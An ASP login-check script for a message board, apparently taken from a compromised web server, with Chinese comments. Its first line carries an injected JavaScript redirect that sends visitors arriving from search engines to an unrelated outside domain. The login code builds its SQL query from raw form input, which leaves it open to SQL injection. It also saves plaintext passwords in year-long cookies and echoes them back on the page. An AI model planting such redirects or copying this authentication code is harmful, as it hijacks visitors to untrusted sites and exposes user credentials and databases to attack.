d:\wwwroot\wuchunhua\liuyan\checkpwd.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!---->点击登录 按钮：会post到checkpwd。asp页面，会传递函数： RemMe是验证码 passwd是密码 name是名字，可以在下页显示：
002: <%
003: dim name
004: '不支持这句话：name=request.form1("name")
005: '不支持这句话：passwd=request.form("passwd")
006: '不支持这句话：RemMe=request.form("RemMe")
007: '不支持这句话：SafeCode=request.form("SafeCode")
008: %>
009: 上页面传递过来此页面的信息：你填写的信息为：<br />
010: 姓名：<%=name%><br>
011: 密码：<%=passwd%> 　
012: 是记住登录<%=RemMe%> 　
013: 是验证码<%=SafeCode%><%
014:    '去除表单数据中的空格
015:   UserName = Trim (Request.Form("name"))
016:   UserPass = Trim (Request.Form("passwd"))
017:   SafeCode = Trim(Request.Form("SafeCode"))
018:   
019:   '用户名、密码、验证码都必须填写
020:   If (UserName="" Or UserPass="" Or SafeCode="") Then
021:     Response.Redirect "login.asp?ErrMsg=请完整填写登陆表格"
022:     Response.End()
023:   End If
024:   
025:   '检验验证码的输入是否正确
026:   If (SafeCode <> Session("SafeCode")) Then
027:      Response.Redirect "login.asp?ErrMsg=请输入正确的验证码"
028:     Response.End()
029:   End If
030:   
031:   Dim objConn, strSQL, objRS
032:   
033:   '初始化数据库连接
034:   DB="./Board/database/BOARD.mdb"
035:   Set objConn = Server.CreateObject("ADODB.Connection")                          
036:   objConn.ConnectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(DB)
037:   '打开数据库连接
038:   objConn.Open
039:   
040:   '检索数据库中是否存在相关记录
041:   strSQL = "Select * From MEMBER Where NAME='" & UserName & "'"
042:   strSQL = strSQL & " And PASSWORD = '" & UserPass & "'"
043:   Set objRS = Server.CreateObject("ADODB.Recordset")
044:   objRS.Open strSQL, objConn, 1, 3, 1
045:   
046:   '检索结果为空，表明用户名或者密码错误
047:   If objRS.EOF Then
048:     Response.Redirect "login.asp?ErrMsg=用户名或密码错误"
049:     Response.End()
050:   Else
051:    '检索记录集不为空，说明用户名和密码输入正确
052:      Session("Id") = CStr(objRS.Fields("ID"))
053:      Session("Name") = UserName
054:    Session("Class") = objRS.Fields("CLASS")
055:      Session("IsPassed")=TRUE
056:      '检查用户的级别
057:    If objRS.Fields("CLASS") = "1" OR objRS.Fields("CLASS") = "2" Then
058:       '该登陆用户为管理员
059:       Session("IsAdmin") = TRUE
060:    Else
061:       '该登陆用户为普通用户
062:       Session("IsAdmin") = FALSE
063:    End If
064:   
065:    '如果用户选择记住帐号和密码，则将其写入cookies
066:    If Request.Form("RemMe") = "1" Then
067:         Response.Cookies("Name") = UserName
068:         Response.Cookies("Password") = UserPass
069:       Response.Cookies("RemMe") = "1"
070:       Response.Cookies("Name").expires = Date + 365
071:        Response.Cookies("Password").expires = Date + 365
072:       Response.Cookies("RemMe").expires = Date + 365
073:      End If
074:   End If
075:   
076:   '关闭记录集和数据库连接
077:   objRS.Close        
078:   Set objRS = Nothing
079:   objConn.Close        
080:   Set objConn = Nothing
081:
082:   '转向系统主页面
083:   Response.Redirect "index.asp"
084:   Response.End()
085: %>
086:
087:

---